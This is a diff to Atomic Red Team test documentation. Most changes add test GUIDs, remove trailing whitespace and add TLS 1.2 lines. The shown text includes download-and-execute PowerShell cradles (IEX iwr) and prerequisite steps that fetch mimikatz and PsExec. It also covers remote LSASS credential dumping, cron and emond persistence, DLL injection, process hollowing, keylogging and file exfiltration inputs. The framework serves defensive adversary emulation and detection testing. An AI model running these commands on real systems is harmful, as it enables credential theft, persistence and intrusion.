+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | sender | The email address of the sender | String | test@corp.com|
@@ -25,10 +25,14 @@ Upon successful execution, sh will spawn ssh contacting a remote domain (default
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | target SSH domain | url | target.example.com|

@@ -58,10 +62,14 @@ Upon successful execution, tar will compress /Users/* directory and password pro
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username for domain | string | atomic|
 | password | password for user | string | atomic|
@@ -27,6 +27,10 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
+
+
+



@@ -55,6 +59,10 @@ Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. R
 **Supported Platforms:** Windows


+**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
+
+
+



@@ -81,6 +89,10 @@ Upon successful execution, sh will execute `netstat` and `who -a`. Results will
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
+
+
+



@@ -99,7 +111,7 @@ who -a
 ##### Description: Check if netstat command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -120,10 +132,14 @@ Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results
 **Supported Platforms:** Windows


+**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
 | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder&#92;T1049&#92;bin&#92;SharpView.exe|
@@ -146,7 +162,7 @@ foreach ($syntax in $syntaxList) {
 ##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{SharpView}) {exit 0} else {exit 1} 
+if (Test-Path #{SharpView}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -17,10 +17,14 @@ This test submits a command to be run in the future by the `at` daemon.
 **Supported Platforms:** Linux


+**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | time_spec | Time specification of when the command should run | String | now + 1 minute|
 | at_command | The command to be run | String | echo Hello from Atomic Red Team|
@@ -40,7 +44,7 @@ echo "#{at_command}" | at #{time_spec}
 ##### Description: The `at` and `atd` executables must exist in the PATH
 ##### Check Prereq Commands:
 ```sh
-which at && which atd 
+which at && which atd
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -49,7 +53,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na
 ##### Description: The `atd` daemon must be running
 ##### Check Prereq Commands:
 ```sh
-systemctl status atd || service atd status 
+systemctl status atd || service atd status
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -22,6 +22,10 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task
 **Supported Platforms:** Windows


+**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+
+
+



@@ -21,10 +21,14 @@ This test replaces the current user's crontab file with the contents of the refe
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | /tmp/evil.sh|
 | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
@@ -56,10 +60,14 @@ This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in cron folder | string | persistevil|
@@ -96,10 +104,14 @@ This test adds a script to a /var/spool/cron/crontabs folder configured to execu
 **Supported Platforms:** Linux


+**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
 | cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|
@@ -17,10 +17,14 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
 **Supported Platforms:** macOS


+**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
 | script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|
@@ -30,6 +30,10 @@ the tasks, open the Task Scheduler and look in the Active Tasks pane.
 **Supported Platforms:** Windows


+**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
+
+
+



@@ -60,10 +64,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows


+**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -96,10 +104,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
 **Supported Platforms:** Windows


+**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
 | time | What time 24 Hour | String | 72600|
@@ -135,6 +147,10 @@ Upon successful execution, powershell.exe will create a scheduled task to spawn
 **Supported Platforms:** Windows


+**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
+
+
+



@@ -169,10 +185,14 @@ This module utilizes the Windows API to schedule a task for code execution (note
 **Supported Platforms:** Windows


+**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|

@@ -181,7 +201,8 @@ This module utilizes the Windows API to schedule a task for code execution (note


 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
 ```

@@ -197,7 +218,7 @@ try {
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -216,6 +237,10 @@ Create an scheduled task that executes notepad.exe after user login from XML by
 **Supported Platforms:** Windows


+**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+
+
+



@@ -127,7 +127,8 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
      Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
    name: powershell
 - name: WMI Invoke-CimMethod Scheduled Task
@@ -19,10 +19,14 @@ This test creates Systemd service and timer then starts and enables the Systemd
 **Supported Platforms:** Linux


+**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service|
 | path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer|
@@ -19,10 +19,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|

@@ -48,10 +52,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|

@@ -24,10 +24,14 @@ With default arguments, expect to see a MessageBox, with notepad's icon in taskb
 **Supported Platforms:** Windows


+**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
 | dll_payload | DLL to Inject | Path | PathToAtomicsFolder&#92;T1055.001&#92;src&#92;x64&#92;T1055.001.dll|
@@ -48,7 +52,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
 ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -29,10 +29,14 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
 **Supported Platforms:** Windows


+**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_binary | Output Binary | Path | PathToAtomicsFolder&#92;T1055.004&#92;bin&#92;T1055.exe|

@@ -22,10 +22,14 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
 **Supported Platforms:** Windows


+**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | parent_process_name | Name of the parent process | string | explorer|
@@ -60,10 +64,14 @@ This module executes notepad.exe from within the WINWORD.EXE process
 **Supported Platforms:** Windows


+**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|

@@ -72,7 +80,8 @@ This module executes notepad.exe from within the WINWORD.EXE process


 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
 ```

@@ -88,7 +97,7 @@ try {
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -59,6 +59,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
      Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
    name: powershell
@@ -25,6 +25,10 @@ is required.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
+
+
+



@@ -32,7 +36,8 @@ is required.


 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
 ```

@@ -48,7 +53,7 @@ try {
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -63,6 +68,7 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th

 ## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
 Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+Especially useful against domain controllers in Active Directory environments.
 It must be executed in the context of a user who is privileged on remote `machine`.

 The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
@@ -70,10 +76,14 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 **Supported Platforms:** Windows


+**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | machine | machine to target (via psexec) | string | DC1|
 | mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
@@ -95,11 +105,12 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -108,10 +119,11 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
 Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
 New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -26,13 +26,15 @@ atomic_tests:
      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
  executor:
    command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
    name: powershell
 - name: Remote Process Injection in LSASS via mimikatz
  auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
  description: |
    Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+    Especially useful against domain controllers in Active Directory environments.
    It must be executed in the context of a user who is privileged on remote `machine`.

    The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
@@ -60,6 +62,7 @@ atomic_tests:
      if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
    get_prereq_command: |
      $mimikatz_path = cmd /c echo #{mimikatz_path}
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
      Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
      New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -69,6 +72,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
      New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -29,10 +29,14 @@ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and outp
 **Supported Platforms:** Windows


+**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filepath | Name of the local file, include path. | Path | $env:TEMP&#92;key.log|

@@ -67,6 +71,10 @@ Use 'aureport --tty' or other audit.d reading tools to read the log output, whic
 **Supported Platforms:** Linux


+**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
+
+
+



@@ -85,6 +93,18 @@ sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth



+#### Dependencies:  Run with `sh`!
+##### Description: Checking if pam_tty_audit.so is installed
+##### Check Prereq Commands:
+```sh
+test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
+```
+##### Get Prereq Commands:
+```sh
+echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+```
+
+


 <br/>
@@ -32,10 +32,13 @@ atomic_tests:
    Passwords hidden by the console can also be logged, with 'log_passwd' as in this example.  If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
   
    Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary.  Mac OS does not currently contain the pam_tty_audit.so library. 
-  prereq_command: |
-    test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
-  get_prereq_command: |
-    echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
+  dependencies:
+  - description: |
+      Checking if pam_tty_audit.so is installed
+    prereq_command: |
+      test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'
+    get_prereq_command: |
+      echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"
  supported_platforms:
  - linux
  executor:
@@ -20,6 +20,10 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
 **Supported Platforms:** macOS


+**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
+
+
+



@@ -46,6 +50,10 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
 **Supported Platforms:** Windows


+**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+
+
+



@@ -20,10 +20,14 @@ Hooks functions in PowerShell to read TLS Communications
 **Supported Platforms:** Windows


+**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | Dll To Inject | Path | PathToAtomicsFolder&#92;T1056.004&#92;bin&#92;T1056.004x64.dll|
 | server_name | TLS Server To Test Get Request | Url | https://www.example.com|
@@ -44,7 +48,7 @@ curl #{server_name} -UseBasicParsing
 ##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -21,10 +21,14 @@ Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | path of output file | path | /tmp/loot.txt|

@@ -57,6 +61,10 @@ Upon successful execution, cmd.exe will execute tasklist.exe to list processes.
 **Supported Platforms:** Windows


+**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
+
+
+



@@ -55,10 +55,14 @@ Download Mimikatz and dump credentials. Upon execution, mimikatz dump details an
 **Supported Platforms:** Windows


+**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|

@@ -86,10 +90,14 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows


+**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path for SharpHound payload | String | PathToAtomicsFolder&#92;T1059.001&#92;src|

@@ -115,7 +123,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
 ##### Description: SharpHound.ps1 must be located at #{file_path}
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -136,6 +144,10 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows


+**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
+
+
+



@@ -167,6 +179,10 @@ Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1
 **Supported Platforms:** Windows


+**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
+
+
+



@@ -193,6 +209,10 @@ Run mimikatz via PsSendKeys. Upon execution, automated actions will take place t
 **Supported Platforms:** Windows


+**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
+
+
+



@@ -219,6 +239,10 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
 **Supported Platforms:** Windows


+**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
+
+
+



@@ -245,10 +269,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows


+**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1|

@@ -276,10 +304,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows


+**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml|

@@ -307,10 +339,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows


+**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct|

@@ -337,6 +373,10 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 **Supported Platforms:** Windows


+**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
+
+
+


 #### Run it with these steps! 
@@ -359,6 +399,10 @@ art-marker.txt is in the folder.
 **Supported Platforms:** Windows


+**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
+
+
+



@@ -392,6 +436,10 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
+
+
+



@@ -409,7 +457,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion
 ##### Description: PowerShell version 2 must be installed
 ##### Check Prereq Commands:
 ```powershell
-if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} 
+if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -428,10 +476,14 @@ Creates a file with an alternate data stream and simulates executing that hidden
 **Supported Platforms:** Windows


+**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ads_file | File created to store Alternate Stream Data | String | $env:TEMP&#92;NTFS_ADS.txt|

@@ -456,7 +508,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore
 ##### Description: Homedrive must be an NTFS drive
 ##### Check Prereq Commands:
 ```powershell
-if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} 
+if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
 ```
